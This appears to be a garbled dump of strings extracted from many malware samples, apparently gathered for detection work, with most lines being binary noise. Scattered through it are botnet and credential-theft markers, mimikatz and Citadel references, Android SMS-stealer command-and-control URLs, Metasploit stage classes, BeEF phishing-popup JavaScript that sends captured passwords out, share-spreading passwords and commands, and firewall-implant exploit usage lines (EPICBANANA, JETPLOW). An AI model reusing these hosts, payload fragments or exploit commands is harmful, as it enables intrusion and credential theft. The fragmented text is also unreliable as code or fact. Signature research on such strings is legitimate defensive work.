Unavailable wh_keyboard_llwsock32.dllwininet.dll\\chicken\\release\\svchost.pdb\\intergratechk\\release\\intergratechk.pdbfake.cf8.8.8.8processor(%d)\\dbprotectsupportdm1712/`jvpnpkte/bplinstallservice npf %d68961installservice dbprotectsupport %dc:\\program files\\dbprotectsupport\\npf.sysfake.cfgthreadattack.cppfake.cppdns_arraydomainrandexcpu %llu %llu %llu %llu[ %02d.%02d %02d:%02d:%02d.%03ld ] [%lu] [%s] %scoded by brian krebs for personnal use only. i love my job & wife.http://%02x%02x%02x%02x%02x%02x%02x%02x.com/%02x%02x%02x%02x/%02x%02x%02x%02x%02x.php%botid%%botnet%bc_removebc_addhttp://www.google.com/webhpcoded by brian krebs for personal use only. i love my job & wife
Unavailable @y8e~
Unavailable /churraskito/-->this exploit gives you a local system shell~ ms10_048 x64 exp ~
Unavailable j/v/1
Unavailable ?<ssylkaustanavlivatpoluchitpereslatderzhatvykhoditnachaloh
Unavailable uoh4xc
Unavailable t$xf;
Unavailable 4]5t
Unavailable c/[;3
Unavailable f.wv
Unavailable s<}ek
Unavailable .?avtype_info@@
Unavailable t7d+
Unavailable citadel hooking error[%s]: checking \"ftp account: ftp/ftp@ftp.net\" ...[%s]: ipc null session connection success !!!scan %d targets,use %4.1f minuteshttp://blog.gentilkiwi.com/mimikatzbenjamin delpyglobalsignc
Unavailable j/0a
Unavailable 67t]?^
Unavailable dddd, mmmm dd, yyyy
Unavailable ntwdblib.dllt
Unavailable r\kmwmbk\r
Unavailable dc{}$
Unavailable z@ml
Unavailable .}4nscq
Unavailable esamsrv.dllhookdc.dllcdlocatecsystemsamiretrieveprimarycredentialssamiretrievemultipleprimarycredentials3
Unavailable t$(qr
Unavailable zcl}
Unavailable tbts9abp
Unavailable rar configmz
Unavailable |$8i
Unavailable &|fmq
Unavailable vu~u
Unavailable gm6^=
Unavailable j7e27b224ea15b787a428dcfe47a7216b3da9c447ac522deb" // key="system323bcd1fghijklmabcdefgh-j+lmnopq4stuvwxyznopq7stuvwxyz0e2ar56r89k/9c886aad51ac7356" // key = "hongkongw8rt$3%cnpost^~qdkwero38oera^t@#
Unavailable [-at
Unavailable r!sc
Unavailable jk6illp
Unavailable !ddedata initialized (ansi), app strings are '%s' and '%s'
Unavailable wcbg
Unavailable %dts
Unavailable <:l*
Unavailable -)tw!
Unavailable @recdiscm32.exe\\\\%s\\shared$\\syswow64\\\\%s\\shared$\\system32!emcfgv7xc8itavgn0bmf!ctrhfex5m9jnzddfpk!vwbebxyx1nzrckblgqoiamsorry!@1234567cmd.exe /c \"net share admin$ /d\"mail from:<subject: %s|%s|%s
Unavailable d>ax
Unavailable noobyprotect se 1.1.1.0
Unavailable b$mm
Unavailable rqtc
Unavailable pzlz
Unavailable >f;}
Unavailable yb:}
Unavailable gdi32.dlla
Unavailable iyuv
Unavailable t!a;
Unavailable @ssf
Unavailable d88tt3
Unavailable @"k
Unavailable u<ru7.g^
Unavailable -?:w#h(
Unavailable /w*|u
Unavailable t33x
Unavailable $ayy
Unavailable &xa:^
Unavailable 'l*v
Unavailable rab3g:sun:sunday:mon:monday:tue:tuesday:wed:wednesday:thu:thursday:fri:friday:sat:saturdays
Unavailable tooel\
Unavailable (t$
Unavailable ]j\g
Unavailable [&.dhx
Unavailable projectdatadescryptokeepaliveipnetrowlogclientmessage|clienthostget_connectedco$
Unavailable \v$i
Unavailable wv5u15v
Unavailable gk${
Unavailable 8]z-
Unavailable p,~a
Unavailable 3.fuxloadlibrarya
Unavailable zlcs
Unavailable <br><p align=\"center\"><b>rangescan produced by isn03.xyzcmd \\\\remoteip /user:administrator /pwd:1234 /nowait trojan.exefail to injectbtgremote pro; v1.5 b/{permission denial to exec command.:(by eyas<cooleyas@21cn.com>connect to %s mssql server success.enjoy the shell.^_^usage: %s <host> <uid> <pwd>sqlcmd2.exe inside edition.http://www.patching.net 2000/12/14example: %s 192.168.0.1 sa \"\"a
Unavailable i9\$ ~@h
Unavailable connected [%s:%d]...reuse possible: %c] => %d%%\x0ac:\\winnt\\system32\\cmd.exec:\\windows\\system32\\cmd.exec:\\windows\\command.comcopy \"%s\" \"%s\" /yhttp://%s/files/\"%s\". %s: \"%s\".0x0666----------------this_is_a_boundary$server 2012server 2008server 2003net.exe group \"domain admins\" /domainnet.exe group \"admins. do dom(svrid=%d)(tg=%d)(svr=%s)net.exe localgroup administradoresc:\\cmd32dll.exe{\\*\\generator msftedit 5.41.attachment 1: complete professional backgrounde-mail: \\cf1\\ul\\f1education:\\park
Unavailable jkqu
Unavailable -{vda\
Unavailable _corexemain
Unavailable getstringtypew
Unavailable public:
Unavailable mj/,7
Unavailable ??
Unavailable p%^bo
Unavailable c<v?6y
Unavailable :\":':,:5:=:b:k:p:u:^:c:h:q:v:{:y@.hdd \\0$0+02090@0g0n0u0\\0c0j0v0{06\"6(6-6:6i6o6t6a6p6v6{61\"1/14191f1k1p1]1b1g1t1y1~10\"0(0-0<0b0g0s0_0d0s0y0~09\"9'959:9?9l9q9^9c9p9y9~93%3*363=3b3n3t3y3e3k3p3|34#4)4.4:4c4h4t4z4_4k4q4v4|&.wtm6#63686e6j6w6\\6i6n6{6;\";(;7;f;w;];f;o;{;0+02080>0b0p0\\0i0|01 1(10181c1n1y1d1o1z13 3%3*3;3@3e3r3^3c3t3y38\"8)8.8:8?8s8x8f8r8x88$8+82898@8g8n8u8\\89-929?9p9u9b9s9x99*9/9<9a9n9t9`9e9r9w92-292?2g2n2u2\\2c2j2q29u
Unavailable yy^[_
Unavailable _^[y
Unavailable w!!uv
Unavailable scg2
Unavailable fc9<hu
Unavailable 0b;x;
Unavailable `generic-method-parameter-
Unavailable }fht
Unavailable jgfll
Unavailable nvsmartmax.dll.urlnv.execryptprotectmemory failedcryptunprotectmemory failedr
Unavailable this operating system is not supported.win32 only![lordpe]crtdll.dllvbscriptcouninitializethe revelationhelper.dll file is corrupt or missing.b
Unavailable 9s<^
Unavailable ood^%]
Unavailable -pathdeleted-(
Unavailable b2sp
Unavailable za"w
Unavailable 2tm'
Unavailable h\+c
Unavailable proxy info is %s %s %s %sdomian: %s, port: %s, test domain: %sproxy num: %d, proxy ip: %s, proxy port: %s, proxy user: %s, proxy pass: %sencode domain: %s
Unavailable 4f;]
Unavailable ca< t(<#t
Unavailable !.t)
Unavailable >k3jq
Unavailable mail-news.eicp.netcmd.exe /c ping 127.0.0.1 && ping 127.0.0.1 && sc start %s && ping 127.0.0.1 && sc start %srundll32.exe \"%s\", runmebydll32e
Unavailable banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
Unavailable view mcpvreadvarpercon as select variableid,variabletypeid,formatfitting,scaleid,variablename,addressparameter,protokoll,maxlimis
Unavailable {a*t
Unavailable ykrm
Unavailable panm\a
Unavailable {9?o
Unavailable #j2b
Unavailable j@d)
Unavailable =u3^
Unavailable %s (%s)
Unavailable |;vgg
Unavailable l$pu
Unavailable k.f?
Unavailable ~7@d
Unavailable =v8-
Unavailable e:n)
Unavailable tcp_keepintvl
Unavailable hx#4
Unavailable igzb
Unavailable j#^h
Unavailable !naj!35u
Unavailable advd
Unavailable qvnq
Unavailable h9(u
Unavailable ==%n
Unavailable ooe
Unavailable 5![d
Unavailable ummyj
Unavailable hdvc
Unavailable gg.y
Unavailable p=jk
Unavailable s{px
Unavailable createfilemappinga
Unavailable h<=a
Unavailable 5%u1
Unavailable tloss error
Unavailable tryc
Unavailable w3t=}f
Unavailable find_repeatprocesss
Unavailable t$dm
Unavailable 1 ypo3
Unavailable d$vh
Unavailable icvu
Unavailable rsa1
Unavailable vyf+t
Unavailable s5pm
Unavailable ;p.t
Unavailable fd9t$b
Unavailable ]eqf"v
Unavailable pink.classpopers.classthequickbrownfxjmpsvalzydg\x00
Unavailable software\\borland\\delphi\\rtlsvw
Unavailable f<"u
Unavailable qbs+
Unavailable [`?s
Unavailable cfffrx,`,`2$f=
Unavailable __eabi
Unavailable unknown module name
Unavailable @8>u
Unavailable ahyn
Unavailable =|xb
Unavailable +m.q
Unavailable f94hu
Unavailable mineimport_endss
Unavailable p]mq
Unavailable d$(h;
Unavailable s).7
Unavailable i&b|
Unavailable mfws'
Unavailable /.'6
Unavailable wefp
Unavailable vqn<#^
Unavailable gdi32.dll
Unavailable uk;#r
Unavailable "80?
Unavailable & h,vc
Unavailable v2!l.2
Unavailable kbz^
Unavailable secureexe executable file protector
Unavailable %s - simple sniffer for win2000 -pass : filter username/password -udp : output udp packets -tcp : output tcp packetsfscan v1.12 - command line port scanner. -n - no port scanning - only pinging (unless you use -q)example: fscan -bp 80,100-200,443 10.0.0.1-10.0.1.200 -z - maximum simultaneous threads to use for scanningfailed to open the ip list file \"%s\" -p - tcp port(s) to scan (a comma separated list of ports/ranges) bind port number out of range. using system default.f
Unavailable p]rw
Unavailable &m24
Unavailable nfcore.dllprocgonfcoreokm
Unavailable dd$3o
Unavailable \$ uh
Unavailable iud"
Unavailable wj!,
Unavailable !e`x
Unavailable ./epicbanana_2.0.0.1.py -t 127.0.0.1 --proto=ssh --username=cisco --password=cisco --target_vers=asa804 --mem=na -p 22 -t target_ip, --target_ip=target_ip -- either 127.0.0.1 or win ops ip./bride-1100 --lp 127.0.0.1 --implant 127.0.0.1 --sport rhp --dport rhp--target_vers=target_vers target pix version (pix712, asa804) (required)-p dest_port, --dest_port=dest_port defaults: telnet=23, ssh=22 (optional) - change to local redirect portthis operation is complete, bananaglee willcd /current/bin/fw/bgxxxx/install/lpprofprocesspacketgettimeslotcmdhandlergetipipcmdhandlerprofstartscantmpdata.1resetcmdhandlercd /current/bin/fw/bananaglee/$bgver/install/lp/jetplow***** please place your ua in /current/bin/fw/ops *****ln -s ../jp/orig_code.bin orig_code_pixgen.bin***** welcome to jetplow *****get_lsl_interfacesencryptfc4payloadbeacon_getconfigformbeaconpacketbeacon_reconfiguredumpconfiggetstatushandlerxtractdatato disable password checking on target:[-] target is running[-] problem importing version-specific shellcode from[+] importing version-specific shellcode[-] unsupported target version, abortthe --spoof option requires 3 or 4 fields as follows redir_ip[-] timeout waiting for response - target may have crashed[-] no response from health check - target may have crashedmemset 00e9a05c 4 38845b88_hidecmdmemset 013abd04 1 0dcould not connect to target device: %s:%d. please check ip address.command data size is invalid for an exec cmda script was specified but target is not a ppc405-based netscreen (ns5xt, ns25, and ns50). executing scripts is supported but maexecute 0x%08x with args (%08x, %08x, %08x, %08x): [y/n]execute 0x%08x with args (%08x, %08x, %08x): [y/n][%d] execute code.execute 0x%08x with args (%08x): [y/n]dump_value_lhash_doall_argeggcode is complete. pass execution to it? [y/n]required by seconddatehelp='output file name (optional). by default the resulting data is written to stdout.')data = '<html><body onload=\"location.reload(true)\"><iframe src=\"%s\" height=\"1\" width=\"1\" scrolling=\"no\" frameborder=\"version='%prog 1.0',usage='%prog [ ... options ... ] url',readflashhandlerflashrtnspix6x.cfix_ip_cksum_incrwriteflashhandlerusage %s \"<tcpdump pcap string>\" <outfile>error reading dump file: %struncated dump file; tried to read %u captured bytes, only got %lu%s: link-layer type %d isn't supported in savefilesdlt %d is not one of the dlts supported by this deviceusage: storefc.py --configfile=<path to xml file> --implantfile=<path to binstore implant> [--outputfile=<file to write the confraise exception, \"must supply both a config file and implant file.\"this is wrapper for store.py that felonycrowbar will use. thisdef hexdump(x,lead=\"[+] \",out=sys.stdout):print >>out, \"%s%04x \" % (lead,i),print >>out, \"%02x\" % ord(x[i+j]),print >>out, sane(x[i:i+16])components/modules/biosmodule/implant/e28f6/../e28f640j3_asm.scmosreadbytechecksumareaconfirmed.0writespeedplow.c--cmd %x --idkey %s --sport %i --dport %i --lp %s --implant %s --bsize %hu --logdir %s --lptimeout %u%s -c <cmdtype> -l <lp> -i <implant> -k <ikey> -s <port> -d <port> [operation] [options]* [%lu] 0x%x is marked as stateless (the module will be persisted without its configuration)%s version %s already has persistence installed. if you want to uninstall,the active module(s) on the target are not meant to be persistedlp.c:pixsecurity - improper number of bytes read in security/interface informationlp.c:pixsecurity - not in sessiongetmodinterface__preloadedmodulesshowcommandsreadmoduleinterfacewrapping_not_necessary_or_wrapping_okget_cmd_listlp_listen2killcmdlistmodule and implant versions do not match. this module is not compatible with the target implant%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.log%s/bf_%04d%02d%02d.log%s/bf_read_%08x_%04d%02d%02d_%02d%02d%02d.bin* not attempting to execute \"%s\" commandterminating script (command error or \"quit\" encountered)execute code in <file> passing <argx> (hex)* use arrow keys to scroll through command historypitcmd_processcmdlineexecute all commands in <file>__processshellcmdpittarget_getdstport__processsettargetiplogging commands and output - onthis command is too dangerous. if you'd like to run it, contact the development teamimplant version-specific values:this function should not be used with a netscreen, something has gone horribly wrongcreatesendrecv: recv'd an error from the target.error: watchdogtimeout read returned %d instead of 4command has not yet been codedbeacon domain : www.%s.comthis command can only be run on a pix/asawarning! bad or missing flash values (in section 2 of .dat file)printing the interface info and security levels. pix only.incomplete and must be removed manually.)%s: recv'd an error from the target.unable to fetch the address to the get_uptime_secs function for this os versionupload/activate/de-activate/remove/cmd function faileddo you wish to activate the implant that is already on the firewall? (y/n): there is no implant present on the firewall.implant version :%lx%lx%lxyou may now connect to the implant using the pbd idkeyno reply from persistant back door.rm -rf pbd.wc; wc -c %s > pbd.wcpbd_getversionpbd/pbdencrypt.binpbd/pbdgetversion.pktpbd/pbdstartwrite.binpbd/pbd_setnewhookpt.pktpbd/pbd_upload_singlepkt.pktunable to fetch hook and jmp addresses for this os versioncould not get hook and jump addressesenter the name of a clean implant binary (not an image):unable to read dat file for os version 0x%08lxinvalid implant fileprint \"[+] connecting to %s:%s\" % (self.params.dst['ip'], self.params.dst['port'])@overridable(\"must be overriden if the target will be touched. base implementation should not be called.\")@overridable(\"must be overriden. base implementation should not be called.\")exp.load_vinfo()if not okay and self.terminateflingonexception:print \"[-] keyboard interrupt before response received\"if self.terminateflingonexception:print 'debug info ','='*40modules persistence file written successfullymodules persistence data successfully removedno modules are active on the firewall, nothing to persisterror while attemping to persist modules:error while reading interface info from pixlp.c:pixfree - failed to get responsewarning: lp timeout specified (%lu seconds) less than default (%u seconds). setting defaultunable to fetch config address for this os versionlp.c: interface information not available for this session[%s:%s:%d] error: extract_fgbgwarning: session may not have been closed!exec packet processedfailed to insert the command into command list.send_packet: trying to send too much data.payloadlength >= max_allow_size.wrong payload sizeunknown packet received......returned eax = %08xlogging.error(\" perhaps you should run with --scan?\")logging.error(\"error: no entry for etag [%s] in %s.\" %\"be supplied\")received prompt, we're infailed to login, bad creds, abortsending command \" + str(n) + \"/\" + str(tot) + \", len \" + str(len(chunk) + received nat - epba: ok, payload: mangled, did not runno status returned from target, could be an exploit failure, or this is a version where we don't expect a stus returnreceived arp - epba: ok, payload: failchopped = string.rstrip(payload, \"\\x0a\")shstrtab
Unavailable z+g'}
Unavailable p`/i
Unavailable (apb<l
Unavailable 4+d0
Unavailable -----
Unavailable e'd!
Unavailable 0sit
Unavailable 0svv,n
Unavailable v01wb
Unavailable dn")hgy
Unavailable che3
Unavailable xn!-
Unavailable wqrs
Unavailable 01+x(*7?*95x;9667getapula.pdbwtsapi32.dllcmpbk32.dllpostmessageapeekmessagewdispatchmessagewwtsenumeratesessionsa
Unavailable >jj$
Unavailable d8.tnh
Unavailable d$he3
Unavailable rr~5b
Unavailable $`%e
Unavailable nsx=
Unavailable 5#`oo&s
Unavailable xf))
Unavailable <n"
Unavailable fik.
Unavailable 00dc,
Unavailable [<5{;
Unavailable a|aw
Unavailable &m>
Unavailable uscation
Unavailable ]f:<v
Unavailable 1tsp.-q
Unavailable '_k`
Unavailable |$ m
Unavailable wnhl0
Unavailable @ btp
Unavailable a+dv
Unavailable hlzc
Unavailable !aaa.gifrundll32 \"%s\" iasauthieuishowmsdmoe.dllsavservice.exeabcdefhiklmnorstuvwxz1234567890q
Unavailable arun_startuprun_rebootrun_directuninstallcmdshellsu expportscanykcai's shell[%d] failed, %08x[%d] offset can not fetchedwoqunimalegebi$info: this file is packed with the upx executable packer http://upx.sf.net $$id: upx 3.91 copyright (c) 1996-2013 the upx team. all rights reserved. $<
Unavailable f,hu
Unavailable v_'mp
Unavailable +00dc/
Unavailable 3fhcs
Unavailable a p8!7
Unavailable ]\do
Unavailable d$`p
Unavailable !^[l
Unavailable 2]a~
Unavailable mum v
Unavailable disp.dll%x:%x:%x:%x:%x:%x:%x:%x%c%d.%d.%d.%d%c%hd %dsharepwreglistlogdumpn
Unavailable y-prci^j
Unavailable ;h=e%3
Unavailable g%$3
Unavailable creg`
Unavailable stfe;
Unavailable 06g#
Unavailable -wx3
Unavailable (/"l
Unavailable rundllm
Unavailable 3ouw5
Unavailable bb01wb
Unavailable r2<l
Unavailable p[${
Unavailable i^vk
Unavailable ~"j5@bi
Unavailable g&gs
Unavailable pallowidentity protectionallow for allavg firewall asks for confirmation0x1a7b4c9f5061636b61676500000000000000000000000000000000000000000000000000000000000000000000000000000000{\\stylesheet{ normal;}{\\s1 heading 1;}{\\s2 heading 2;}}9e
Unavailable af;t$
Unavailable findfirstfileexw
Unavailable d$p i
Unavailable terminateprocess
Unavailable d$ %
Unavailable pg{k
Unavailable h|xc
Unavailable waitforsingleobject
Unavailable yyud
Unavailable ,pag<-0
Unavailable *o)(\
Unavailable xpxxxx
Unavailable ?lx/
Unavailable l$43
Unavailable hlpuctf.dll
Unavailable 6ad^
Unavailable ntele
Unavailable #lzy
Unavailable hk:@
Unavailable .{<yj!
Unavailable vh0dc
Unavailable <c:.t
Unavailable w{z`qz`9@mdq.4`ql`;|`yx
Unavailable _+`^|
Unavailable 1tpx
Unavailable %xl2z
Unavailable ,7i4
Unavailable w~wy
Unavailable @d'k
Unavailable l1='=4j
Unavailable y_^[
Unavailable gtd)
Unavailable pklite copr. 1991 gif87a`
Unavailable error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
Unavailable ]fl<
Unavailable showwindow
Unavailable 2,c`b
Unavailable ='vtk
Unavailable jbdu
Unavailable wd8l$@t
Unavailable qd9~
Unavailable 8upu
Unavailable -&'d
Unavailable _/2011/n325423.shtml?wyle\\~isun32.exei0$9
Unavailable >~j1
Unavailable xe1"lpb
Unavailable mm/dd/yy
Unavailable @>process isn't exist<shell\\open\\command=\"system volume information\\usbguard.exe\" installuser-agent: mozilla/5.0 (windows nt 6.; wow64; rv:20.0) gecko/20100101 firefox/20.0webhp?rel=psy&hl=7&ai=
Unavailable zji`@
Unavailable qfqt
Unavailable b+l9@
Unavailable s(s?
Unavailable j+mqe
Unavailable cc\gc-
Unavailable rc26
Unavailable "_wi;#-
Unavailable agd2
Unavailable ?uin
Unavailable )isa
Unavailable '\/#
Unavailable x{==
Unavailable |$@h;
Unavailable kev4eo
Unavailable @@aexxzxv1@$$$v@std@@qavclr
Unavailable z%bp
Unavailable >`ad
Unavailable %6xks
Unavailable poll_rateop_time(end hour)%d:tcp:*:enabled%s[pwff_cfg%d]fake_getdlgitemtextw: ***value***=
Unavailable s};p~8v
Unavailable smtqebepk
Unavailable =:ai
Unavailable getmappedfilenamewall_firewalls@
Unavailable dwjn6
Unavailable acce
Unavailable otna.vicp.netsmithking19.gicp.netuser-agent: webclient\\user.iniuser-agent: mozilla/5.0 (windows; u; windows nt 5.1; zh-en; rv:1.7.12) gecko/200\
Unavailable &2cu
Unavailable passwordchangenotifyvplrxzhtudog2j~ldqpqftk(wou\"isztk)startthreadatwinlogon<
Unavailable <security> </security>v
Unavailable mailto:sdemo@263.nets-player.exeh
Unavailable fxy|
Unavailable ot$ h
Unavailable bi]e
Unavailable %s\\tmp%d.exem
Unavailable yhv&}.7
Unavailable o]er
Unavailable &klu
